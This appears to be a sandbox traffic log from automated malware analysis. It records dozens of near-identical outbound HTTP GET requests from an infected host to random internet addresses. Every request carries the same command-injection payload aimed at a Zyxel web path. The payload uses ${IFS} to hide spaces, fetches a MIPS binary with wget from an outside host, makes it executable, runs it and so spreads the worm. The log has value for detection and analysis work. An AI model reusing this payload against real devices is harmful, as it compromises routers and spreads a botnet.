                                              Jan 29, 2024 07:03:50.004375935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4295192.168.2.1434584198.86.156.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004395008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4296192.168.2.144833458.101.194.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004456997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4297192.168.2.144365614.45.89.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004498959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4298192.168.2.1453060143.87.166.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004540920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4299192.168.2.145867079.36.35.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004579067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4300192.168.2.1458138208.165.140.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004618883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4301192.168.2.1435916190.243.119.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004659891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4302192.168.2.145774477.12.201.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004694939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4303192.168.2.1451702138.42.239.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004733086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4304192.168.2.143817458.223.136.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004766941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4305192.168.2.144345457.18.216.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004826069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4306192.168.2.1436302187.147.126.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004846096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4307192.168.2.143467443.18.1.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004890919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4308192.168.2.1452678122.67.53.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004925966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4309192.168.2.1448322115.14.123.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.004972935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4310192.168.2.1438882204.167.16.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005008936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4311192.168.2.143741454.201.21.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005038977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4312192.168.2.1438700126.243.94.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005081892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4313192.168.2.1446042132.226.46.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005141020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4314192.168.2.1457390152.121.197.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005183935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4315192.168.2.1451118152.36.40.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005228996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4316192.168.2.144902442.37.130.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005254984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4317192.168.2.1440454111.201.221.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005286932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4318192.168.2.145070212.204.248.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005332947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4319192.168.2.1434280110.41.151.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005383015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4320192.168.2.1450608194.90.230.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005407095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4321192.168.2.144129660.204.63.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005445004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4322192.168.2.143970066.207.90.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005502939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4323192.168.2.14472388.254.112.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005526066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4324192.168.2.143672498.83.35.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005577087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4325192.168.2.14397789.184.21.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005598068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4326192.168.2.1456086155.46.133.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005685091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4327192.168.2.1445352101.63.14.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005711079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4328192.168.2.1459208122.224.41.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005723000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4329192.168.2.1460300191.99.129.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005768061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4330192.168.2.143921481.156.59.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005786896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4331192.168.2.1455082123.53.119.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005865097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4332192.168.2.143646299.39.121.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005868912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4333192.168.2.144282692.54.243.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005896091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4334192.168.2.1448110172.156.233.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005925894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4335192.168.2.145614875.12.17.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.005956888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4336192.168.2.143501650.100.237.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006010056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4337192.168.2.143971457.176.214.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006021023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4338192.168.2.1458272213.59.72.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006057978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4339192.168.2.143918466.15.40.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006113052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4340192.168.2.1443138148.205.175.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006144047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4341192.168.2.145499014.53.115.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006191015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4342192.168.2.1433050124.151.75.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006236076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4343192.168.2.145383471.9.254.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006280899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4344192.168.2.144711459.227.69.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006352901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4345192.168.2.145720612.27.86.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006375074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4346192.168.2.1460666182.115.223.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006381035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4347192.168.2.1440174104.79.209.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006422043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4348192.168.2.146042025.109.89.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006433010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4349192.168.2.145014262.231.41.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006477118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4350192.168.2.146063082.204.123.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006478071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4351192.168.2.145631219.149.199.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006501913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4352192.168.2.143377632.137.98.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006545067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4353192.168.2.1453260173.21.208.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006577969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4354192.168.2.1439662196.155.71.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006607056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4355192.168.2.1454972176.103.127.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006635904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4356192.168.2.145847089.168.123.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006669044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4357192.168.2.144864427.72.27.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006710052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4358192.168.2.145201219.155.131.181443
                                              TimestampBytes transferredDirectionData
